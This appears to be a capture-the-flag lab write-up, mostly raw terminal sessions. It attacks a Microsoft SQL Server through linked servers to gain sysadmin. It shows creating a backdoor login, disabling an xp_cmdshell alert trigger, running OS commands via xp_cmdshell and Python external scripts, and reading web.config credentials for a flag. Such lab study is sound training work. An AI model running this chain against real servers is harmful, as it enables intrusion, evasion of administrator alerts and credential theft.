20-Huh
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
➜ www impacket-mssqlclient 'external_user:#p00Public3xt3rnalUs3r#@10.13.38.11' -db POO_PUBLIC
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: POO_PUBLIC
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'POO_PUBLIC'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL (external_user dbo@POO_PUBLIC)>
SQL (external_user dbo@POO_PUBLIC)> select @@version;
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64)
Jun 15 2019 00:26:19
Copyright (C) 2017 Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL (external_user dbo@POO_PUBLIC)> select user_name()
---
dbo
SQL (external_user dbo@POO_PUBLIC)> SELECT name FROM master.dbo.sysdatabases;
name
----------
master
tempdb
POO_PUBLIC
SQL (external_user dbo@POO_PUBLIC)> use master
[*] ENVCHANGE(DATABASE): Old Value: POO_PUBLIC, New Value: master
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
SQL (external_user external_user@master)> SELECT * FROM master.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------------- ----------
master dbo spt_fallback_db b'BASE TABLE'
master dbo spt_fallback_dev b'BASE TABLE'
master dbo spt_fallback_usg b'BASE TABLE'
master dbo spt_values b'VIEW'
master dbo spt_monitor b'BASE TABLE'
Nothing was useful.
Linked Servers...
- If a link is enabled (dataaccess set to 1), every user on the database server can use the link regardless of the user’s permissions (public, sysadmin, doesn’t matter)
- If the link is configured to use a SQL account, every connection is made with the privileges of that account (privileges on the link destination). In other words, public user on server A can potentially execute SQL queries on server B as sysadmin.
List links...
SQL (external_user external_user@master)> EXEC sp_linkedservers
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
------------------------ ---------------- ----------- ------------------------ ------------------ ------------ -------
COMPATIBILITY\POO_CONFIG SQLNCLI SQL Server COMPATIBILITY\POO_CONFIG NULL NULL NULL
COMPATIBILITY\POO_PUBLIC SQLNCLI SQL Server COMPATIBILITY\POO_PUBLIC NULL NULL NULL
I can execute commands as POO_CONFIG ->
SQL (external_user external_user@master)> EXEC ('select @@version;') at [COMPATIBILITY\POO_CONFIG];
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64)
Jun 15 2019 00:26:19
Copyright (C) 2017 Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL (external_user external_user@master)> EXEC ('select user_name();') at [COMPATIBILITY\POO_CONFIG];
-------------
internal_user
I am an internal_user here.
Now as POO_CONFIG I ll try to run a command on POO_PUBLIC
I am the sa user here ->
SQL (external_user dbo@POO_PUBLIC)> EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
--
sa
I ll create a user with this ->
SQL (external_user dbo@POO_PUBLIC)> EXEC ('EXEC (''CREATE LOGIN ctflover WITH PASSWORD = ''''P@ssword123!'''';'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
SQL (external_user dbo@POO_PUBLIC)> EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''ctflover'''', ''''sysadmin'''';'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
➜ www impacket-mssqlclient 'ctflover:P@ssword123!@10.13.38.11' -db POO_PUBLIC
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: POO_PUBLIC
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'POO_PUBLIC'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL (ctflover dbo@POO_PUBLIC)> EXEC sp_helpsrvrolemember 'sysadmin';
ServerRole MemberName MemberSID
---------- ------------------------------ -------------------------------------------------------------------
sysadmin sa b'01'
sysadmin COMPATIBILITY\Administrator b'010500000000000515000000d5b47209a82f8f130194523bf4010000'
sysadmin NT SERVICE\SQLWriter b'010600000000000550000000732b9753646ef90356745cb675c3aa6cd6b4d28b'
sysadmin NT SERVICE\Winmgmt b'0106000000000005500000005a048ddff9c7430ab450d4e7477a2172ab4170f4'
sysadmin NT Service\MSSQL$POO_PUBLIC b'010600000000000550000000dd5b12f3370561d12b86d8205c3047eb150c7820'
sysadmin NT SERVICE\SQLAgent$POO_PUBLIC b'01060000000000055000000074cd7c77148ab9ab4233607e09cbd469b4c56cd6'
sysadmin ctflover b'3f2bff2421911d4da0f4533889ec5369'
I am a sysadmin yeee.
Now I have another database I can access(flag db)
SQL (ctflover dbo@POO_PUBLIC)> SELECT name FROM master.dbo.sysdatabases;
name
----------
master
tempdb
model
msdb
POO_PUBLIC
flag
SQL (ctflover dbo@POO_PUBLIC)> use flag
[*] ENVCHANGE(DATABASE): Old Value: POO_PUBLIC, New Value: flag
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'flag'.
SQL (ctflover dbo@flag)> SELECT * FROM flag.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
flag dbo flag b'BASE TABLE'
SQL (ctflover dbo@flag)> select * from flag;
flag
----------------------------------------
b'POO{88d829eb3--SNIP--}'
Command Execution....
Unable to enable xp cmdshell
SQL (ctflover dbo@POO_PUBLIC)> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 11: Attempt to enable xp_cmdshell detected. Database Administrators will be notified!
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 181: The transaction ended in the trigger. The batch has been aborted.
SQL (ctflover dbo@POO_PUBLIC)> EXEC sp_configure 'show advanced options', 1;
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (ctflover dbo@POO_PUBLIC)> RECONFIGURE;
SQL (ctflover dbo@POO_PUBLIC)> sp_configure 'xp_cmdshell', '1'
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 11: Attempt to enable xp_cmdshell detected. Database Administrators will be notified!
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 181: The transaction ended in the trigger. The batch has been aborted.
Removing trigger...
Triggers are rule that stop a user to use xp_cmd_shell. I am a sa, so I can disable it. They are stored in sys.server_triggers.
SQL (ctflover dbo@POO_PUBLIC)> select name from sys.server_triggers;
name
------------------------------
ALERT_xp_cmdshell
SQL (ctflover dbo@POO_PUBLIC)> disable trigger ALERT_xp_cmdshell on all server
SQL (ctflover dbo@POO_PUBLIC)> enable_xp_cmdshell
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (ctflover dbo@POO_PUBLIC)> xp_cmdshell whoami
output
---------------------------
nt service\mssql$poo_public
NULL
Found a config file in webroot
SQL (ctflover dbo@POO_PUBLIC)> xp_cmdshell dir C:\inetpub\wwwroot
output
-----------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is F661-7669
NULL
Directory of C:\inetpub\wwwroot
03/17/2018 11:57 AM <DIR> Uploads
--SNIP--
04/04/2018 11:24 AM 728 web.config
03/17/2018 11:57 AM <DIR> Widgets
4 File(s) 111,385 bytes
15 Dir(s) 10,098,884,608 bytes free
Did not work :(
SQL (ctflover dbo@POO_PUBLIC)> xp_cmdshell type C:\inetpub\wwwroot\web.config
output
-----------------
Access is denied.
NULL
Hacktricks executing external scripts.
SQL (ctflover dbo@POO_PUBLIC)> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
compatibility\poo_public01
This misconfiguration allows a user to execute command as some other user in our case it is compatibility\poo_public01 and luckily this user is able to read web.config.
web.config->
SQL (ctflover dbo@POO_PUBLIC)> EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Express Edition will continue to be enforced.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap
fileExtension=".DS_Store"
mimeType="application/octet-stream"
/>
</staticContent>
<!--
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user
name="Administrator"
password="EverybodyWantsToWorkAtP.O.O."
/>
</credentials>
</forms>
</authentication>
-->
</system.webServer>
</configuration>
We got credentials for administrator on /admin web.
flag->
➜ poo curl http://administrator:EverybodyWantsToWorkAtP.O.O.@10.13.38.11/admin/
"I can't go back to yesterday, because i was a different person then..."<br>
- Alice in Wonderland<br>
<br>
Flag : POO{4882bd2ccfd4b5318978540d9--SNIP--}